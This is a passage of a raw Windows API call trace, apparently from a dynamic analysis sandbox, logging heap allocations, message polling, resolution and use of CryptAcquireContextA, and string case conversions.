hHeap=0x25c0000) returned 1 [0165.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0165.697] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0165.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0165.697] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0165.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0165.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0165.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.699] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0165.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0165.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0165.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0165.701] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0165.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0165.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0165.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0165.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0165.701] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0165.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0165.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0165.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0165.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0165.702] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0165.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0165.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0165.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0165.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0165.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0165.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0165.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0165.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.704] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0165.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.705] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0165.705] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0165.705] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0165.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.705] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0165.705] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.705] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0165.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.705] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.706] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.706] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.706] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0165.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0165.706] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0165.706] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.706] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0165.706] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.707] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0165.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0165.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.707] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.707] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.707] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0165.707] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0165.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0165.708] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0165.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0165.708] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0165.708] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0165.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0165.708] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0165.708] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.708] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.708] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.709] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.709] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.709] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.709] PeekMessageW (in: 